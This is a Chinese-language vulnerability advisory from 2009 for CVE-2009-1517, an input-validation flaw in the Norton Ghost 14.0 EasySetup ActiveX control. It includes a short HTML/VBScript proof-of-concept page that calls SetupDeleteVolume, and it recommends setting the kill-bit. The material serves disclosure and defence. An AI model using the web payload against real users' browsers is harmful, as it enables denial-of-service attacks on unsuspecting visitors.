发布日期：2009-04-23
更新日期：2009-05-05

受影响系统：

Symantec Norton Ghost 14.0

描述：

---

BUGTRAQ  ID: 34696
CVE(CAN) ID: CVE-2009-1517

Symantec Norton Ghost是一个备份恢复系统，允许用户将系统恢复到之前的快照状态。

Norton Ghost的EasySetup安装向导的EasySetupInt.dll库提供了名为Symantec.EasySetup.1的ActiveX控件，该控件没有正确地验证对GetBackupLocationPath、CallUninstall、SetupDeleteVolume、CanUseEasySetup、CallAddInitialProtection、CallTour等方式所传送的输入。如果用户受骗访问了恶意网页并向上述方式提供了超长输入参数的话，就可能导致拒绝服务。

<*来源：shinnai （shinnai@autistici.org）
  
  链接：http://www.milw0rm.com/exploits/8523
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<object classid='clsid:7972D5BE-2213-4B28-884C-F8F82432EAA5' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>

<script language='vbscript'>
Sub tryMe
  test.SetupDeleteVolume()
End Sub
</script>

建议：

---

临时解决方法：

* 为clsid：7972D5BE-2213-4B28-884C-F8F82432EAA5设置kill-bit。

厂商补丁：

Symantec
--------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.symantec.com/

浏览次数：2579
严重程度：0（网友投票）